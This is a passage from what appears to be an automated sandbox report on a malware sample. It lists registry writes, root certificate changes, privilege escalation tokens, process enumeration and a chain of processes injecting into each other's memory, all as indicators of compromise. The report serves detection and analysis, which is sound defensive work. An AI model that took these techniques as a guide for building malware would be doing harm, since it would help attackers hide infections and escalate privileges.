Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-281 = "Central Europe Daylight Time" jK1HRDZ3A7KLdSimVOnZ4RqI.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-122 = "SA Pacific Standard Time" jK1HRDZ3A7KLdSimVOnZ4RqI.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-81 = "Atlantic Daylight Time" jK1HRDZ3A7KLdSimVOnZ4RqI.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-381 = "South Africa Daylight Time" jK1HRDZ3A7KLdSimVOnZ4RqI.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-442 = "Arabian Standard Time" jK1HRDZ3A7KLdSimVOnZ4RqI.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-681 = "E. Australia Daylight Time" jK1HRDZ3A7KLdSimVOnZ4RqI.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-181 = "Mountain Daylight Time (Mexico)" jK1HRDZ3A7KLdSimVOnZ4RqI.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-752 = "Tonga Standard Time" jK1HRDZ3A7KLdSimVOnZ4RqI.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-571 = "China Daylight Time" jK1HRDZ3A7KLdSimVOnZ4RqI.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-832 = "SA Eastern Standard Time" jK1HRDZ3A7KLdSimVOnZ4RqI.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-692 = "Tasmania Standard Time" jK1HRDZ3A7KLdSimVOnZ4RqI.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-82 = "Atlantic Standard Time" jK1HRDZ3A7KLdSimVOnZ4RqI.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-722 = "Central Pacific Standard Time" jK1HRDZ3A7KLdSimVOnZ4RqI.exe Key created \REGISTRY\USER\.DEFAULT\SYSTEM\CurrentControlSet\Control\NetTrace netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-661 = "Cen. Australia Daylight Time" jK1HRDZ3A7KLdSimVOnZ4RqI.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 netsh.exe Key created \REGISTRY\USER\.DEFAULT\SYSTEM\CurrentControlSet\Control\NetTrace\Session netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-21 = "Cape Verde Daylight Time" jK1HRDZ3A7KLdSimVOnZ4RqI.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-382 = "South Africa Standard Time" jK1HRDZ3A7KLdSimVOnZ4RqI.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-632 = "Tokyo Standard Time" jK1HRDZ3A7KLdSimVOnZ4RqI.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-100 = "DHCP Quarantine Enforcement Client" netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-102 = "1.0" netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-291 = "Central European Daylight Time" jK1HRDZ3A7KLdSimVOnZ4RqI.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-892 = "Morocco Standard Time" jK1HRDZ3A7KLdSimVOnZ4RqI.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-932 = "Coordinated Universal Time" jK1HRDZ3A7KLdSimVOnZ4RqI.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-441 = "Arabian Daylight Time" jK1HRDZ3A7KLdSimVOnZ4RqI.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1471 = "Magadan Daylight Time" jK1HRDZ3A7KLdSimVOnZ4RqI.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-3 = "Microsoft Corporation" netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-364 = "Middle East Daylight Time" jK1HRDZ3A7KLdSimVOnZ4RqI.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-672 = "AUS Eastern Standard Time" jK1HRDZ3A7KLdSimVOnZ4RqI.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-772 = "Montevideo Standard Time" jK1HRDZ3A7KLdSimVOnZ4RqI.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-771 = "Montevideo Daylight Time" jK1HRDZ3A7KLdSimVOnZ4RqI.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-22 = "Cape Verde Standard Time" jK1HRDZ3A7KLdSimVOnZ4RqI.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-162 = "Central Standard Time" jK1HRDZ3A7KLdSimVOnZ4RqI.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-51 = "Greenland Daylight Time" jK1HRDZ3A7KLdSimVOnZ4RqI.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-241 = "Samoa Daylight Time" jK1HRDZ3A7KLdSimVOnZ4RqI.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-131 = "US Eastern Daylight Time" jK1HRDZ3A7KLdSimVOnZ4RqI.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-4 = "1.0" netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-101 = "Provides RD Gateway enforcement for NAP" netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-841 = "Argentina Daylight Time" jK1HRDZ3A7KLdSimVOnZ4RqI.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-411 = "E. Africa Daylight Time" jK1HRDZ3A7KLdSimVOnZ4RqI.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-385 = "Namibia Standard Time" jK1HRDZ3A7KLdSimVOnZ4RqI.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-522 = "N. Central Asia Standard Time" jK1HRDZ3A7KLdSimVOnZ4RqI.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-384 = "Namibia Daylight Time" jK1HRDZ3A7KLdSimVOnZ4RqI.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-1 = "IPsec Relying Party" netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-451 = "Caucasus Daylight Time" jK1HRDZ3A7KLdSimVOnZ4RqI.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-332 = "E. Europe Standard Time" jK1HRDZ3A7KLdSimVOnZ4RqI.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-31 = "Mid-Atlantic Daylight Time" jK1HRDZ3A7KLdSimVOnZ4RqI.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-471 = "Ekaterinburg Daylight Time" jK1HRDZ3A7KLdSimVOnZ4RqI.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-212 = "Pacific Standard Time" jK1HRDZ3A7KLdSimVOnZ4RqI.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-103 = "1.0" netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-435 = "Georgian Standard Time" jK1HRDZ3A7KLdSimVOnZ4RqI.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-502 = "Nepal Standard Time" jK1HRDZ3A7KLdSimVOnZ4RqI.exe -
Modifies registry class 5 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000_Classes\Local Settings explorer.exe Key created \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell explorer.exe Key created \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff explorer.exe -
description ioc Process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc35300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a82000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a build2.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4 csrss.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a42000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 csrss.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 build2.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc252000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a build2.exe -
Runs ping.exe 1 TTPs 2 IoCs
pid Process 2460 PING.EXE 2416 PING.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2328 a17cb3f0e417a2dd316f6367f1c55d33403a0fa66fa91d2f97970d38b9b62669.exe 2328 a17cb3f0e417a2dd316f6367f1c55d33403a0fa66fa91d2f97970d38b9b62669.exe 1204 Process not Found 1204 Process not Found 1204 Process not Found 1204 Process not Found 1204 Process not Found 1204 Process not Found 1204 Process not Found 1204 Process not Found 1204 Process not Found 1204 Process not Found 1204 Process not Found 1204 Process not Found 1204 Process not Found 1204 Process not Found 1204 Process not Found 1204 Process not Found 1204 Process not Found 1204 Process not Found 1204 Process not Found 1204 Process not Found 1204 Process not Found 1204 Process not Found 1204 Process not Found 1204 Process not Found 1204 Process not Found 1204 Process not Found 1204 Process not Found 1204 Process not Found 1204 Process not Found 1204 Process not Found 1204 Process not Found 1204 Process not Found 1204 Process not Found 1204 Process not Found 1204 Process not Found 1204 Process not Found 1204 Process not Found 1204 Process not Found 1204 Process not Found 1204 Process not Found 1204 Process not Found 1204 Process not Found 1204 Process not Found 1204 Process not Found 1204 Process not Found 1204 Process not Found 1204 Process not Found 1204 Process not Found 1204 Process not Found 1204 Process not Found 1204 Process not Found 1204 Process not Found 1204 Process not Found 1204 Process not Found 1204 Process not Found 1204 Process not Found 1204 Process not Found 1204 Process not Found 1204 Process not Found 1204 Process not Found 1204 Process not Found 1204 Process not Found -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 2328 a17cb3f0e417a2dd316f6367f1c55d33403a0fa66fa91d2f97970d38b9b62669.exe -
Suspicious use of AdjustPrivilegeToken 37 IoCs
description pid Process Token: SeShutdownPrivilege 1204 Process not Found Token: SeShutdownPrivilege 1204 Process not Found Token: SeShutdownPrivilege 1204 Process not Found Token: SeShutdownPrivilege 1204 Process not Found Token: SeShutdownPrivilege 1204 Process not Found Token: SeShutdownPrivilege 820 explorer.exe Token: SeShutdownPrivilege 820 explorer.exe Token: SeShutdownPrivilege 820 explorer.exe Token: SeShutdownPrivilege 820 explorer.exe Token: SeShutdownPrivilege 820 explorer.exe Token: SeShutdownPrivilege 820 explorer.exe Token: SeShutdownPrivilege 820 explorer.exe Token: SeShutdownPrivilege 820 explorer.exe Token: SeShutdownPrivilege 820 explorer.exe Token: SeShutdownPrivilege 820 explorer.exe Token: SeDebugPrivilege 1696 powershell.exe Token: SeShutdownPrivilege 820 explorer.exe Token: SeDebugPrivilege 2956 installutil.exe Token: SeShutdownPrivilege 820 explorer.exe Token: SeShutdownPrivilege 820 explorer.exe Token: SeShutdownPrivilege 820 explorer.exe Token: SeShutdownPrivilege 820 explorer.exe Token: SeShutdownPrivilege 820 explorer.exe Token: SeDebugPrivilege 2684 jK1HRDZ3A7KLdSimVOnZ4RqI.exe Token: SeImpersonatePrivilege 2684 jK1HRDZ3A7KLdSimVOnZ4RqI.exe Token: SeShutdownPrivilege 820 explorer.exe Token: SeDebugPrivilege 2472 GIJECGDGCB.exe Token: SeShutdownPrivilege 820 explorer.exe Token: SeShutdownPrivilege 820 explorer.exe Token: SeShutdownPrivilege 820 explorer.exe Token: SeShutdownPrivilege 820 explorer.exe Token: SeShutdownPrivilege 820 explorer.exe Token: SeSystemEnvironmentPrivilege 1196 csrss.exe Token: SeDebugPrivilege 2536 powershell.EXE Token: SeShutdownPrivilege 820 explorer.exe Token: SeSecurityPrivilege 2712 sc.exe Token: SeSecurityPrivilege 2712 sc.exe -
Suspicious use of FindShellTrayWindow 33 IoCs
pid Process 820 explorer.exe 820 explorer.exe 820 explorer.exe 820 explorer.exe 820 explorer.exe 820 explorer.exe 820 explorer.exe 820 explorer.exe 820 explorer.exe 820 explorer.exe 820 explorer.exe 820 explorer.exe 820 explorer.exe 820 explorer.exe 820 explorer.exe 820 explorer.exe 820 explorer.exe 820 explorer.exe 820 explorer.exe 820 explorer.exe 820 explorer.exe 820 explorer.exe 820 explorer.exe 820 explorer.exe 820 explorer.exe 820 explorer.exe 820 explorer.exe 820 explorer.exe 2928 srWVeTGyzLkwwb1QBfnCcXzi.exe 820 explorer.exe 820 explorer.exe 820 explorer.exe 820 explorer.exe -
Suspicious use of SendNotifyMessage 32 IoCs
pid Process 820 explorer.exe 820 explorer.exe 820 explorer.exe 820 explorer.exe 820 explorer.exe 820 explorer.exe 820 explorer.exe 820 explorer.exe 820 explorer.exe 820 explorer.exe 820 explorer.exe 820 explorer.exe 820 explorer.exe 820 explorer.exe 820 explorer.exe 820 explorer.exe 820 explorer.exe 820 explorer.exe 820 explorer.exe 820 explorer.exe 820 explorer.exe 820 explorer.exe 820 explorer.exe 820 explorer.exe 820 explorer.exe 820 explorer.exe 820 explorer.exe 820 explorer.exe 820 explorer.exe 820 explorer.exe 820 explorer.exe 820 explorer.exe -
Suspicious use of SetWindowsHookEx 4 IoCs
pid Process 1636 BroomSetup.exe 2796 rundll32.exe 2796 rundll32.exe 2796 rundll32.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1204 wrote to memory of 2664 1204 Process not Found 28 PID 1204 wrote to memory of 2664 1204 Process not Found 28 PID 1204 wrote to memory of 2664 1204 Process not Found 28 PID 2664 wrote to memory of 2472 2664 cmd.exe 30 PID 2664 wrote to memory of 2472 2664 cmd.exe 30 PID 2664 wrote to memory of 2472 2664 cmd.exe 30 PID 1204 wrote to memory of 2752 1204 Process not Found 31 PID 1204 wrote to memory of 2752 1204 Process not Found 31 PID 1204 wrote to memory of 2752 1204 Process not Found 31 PID 1204 wrote to memory of 2752 1204 Process not Found 31 PID 2752 wrote to memory of 760 2752 7C14.exe 32 PID 2752 wrote to memory of 760 2752 7C14.exe 32 PID 2752 wrote to memory of 760 2752 7C14.exe 32 PID 2752 wrote to memory of 760 2752 7C14.exe 32 PID 2752 wrote to memory of 760 2752 7C14.exe 32 PID 2752 wrote to memory of 760 2752 7C14.exe 32 PID 2752 wrote to memory of 760 2752 7C14.exe 32 PID 2752 wrote to memory of 760 2752 7C14.exe 32 PID 2752 wrote to memory of 760 2752 7C14.exe 32 PID 2752 wrote to memory of 760 2752 7C14.exe 32 PID 2752 wrote to memory of 760 2752 7C14.exe 32 PID 760 wrote to memory of 2828 760 7C14.exe 34 PID 760 wrote to memory of 2828 760 7C14.exe 34 PID 760 wrote to memory of 2828 760 7C14.exe 34 PID 760 wrote to memory of 2828 760 7C14.exe 34 PID 760 wrote to memory of 2884 760 7C14.exe 35 PID 760 wrote to memory of 2884 760 7C14.exe 35 PID 760 wrote to memory of 2884 760 7C14.exe 35 PID 760 wrote to memory of 2884 760 7C14.exe 35 PID 2884 wrote to memory of 1996 2884 7C14.exe 36 PID 2884 wrote to memory of 1996 2884 7C14.exe 36 PID 2884 wrote to memory of 1996 2884 7C14.exe 36 PID 2884 wrote to memory of 1996 2884 7C14.exe 36 PID 2884 wrote to memory of 1996 2884 7C14.exe 36 PID 2884 wrote to memory of 1996 2884 7C14.exe 36 PID 2884 wrote to memory of 1996 2884 7C14.exe 36 PID 2884 wrote to memory of 1996 2884 7C14.exe 36 PID 2884 wrote to memory of 1996 2884 7C14.exe 36 PID 2884 wrote to memory of 1996 2884 7C14.exe 36 PID 2884 wrote to memory of 1996 2884 7C14.exe 36 PID 1996 wrote to memory of 2244 1996 7C14.exe 38 PID 1996 wrote to memory of 2244 1996 7C14.exe 38 PID 1996 wrote to memory of 2244 1996 7C14.exe 38 PID 1996 wrote to memory of 2244 1996 7C14.exe 38 PID 2244 wrote to memory of 1980 2244 build2.exe 39 PID 2244 wrote to memory of 1980 2244 build2.exe 39 PID 2244 wrote to memory of 1980 2244 build2.exe 39 PID 2244 wrote to memory of 1980 2244 build2.exe 39 PID 2244 wrote to memory of 1980 2244 build2.exe 39 PID 2244 wrote to memory of 1980 2244 build2.exe 39 PID 2244 wrote to memory of 1980 2244 build2.exe 39 PID 2244 wrote to memory of 1980 2244 build2.exe 39 PID 2244 wrote to memory of 1980 2244 build2.exe 39 PID 2244 wrote to memory of 1980 2244 build2.exe 39 PID 2244 wrote to memory of 1980 2244 build2.exe 39 PID 1980 wrote to memory of 568 1980 build2.exe 42 PID 1980 wrote to memory of 568 1980 build2.exe 42 PID 1980 wrote to memory of 568 1980 build2.exe 42 PID 1980 wrote to memory of 568 1980 build2.exe 42 PID 1204 wrote to memory of 1312 1204 Process not Found 45 PID 1204 wrote to memory of 1312 1204 Process not Found 45 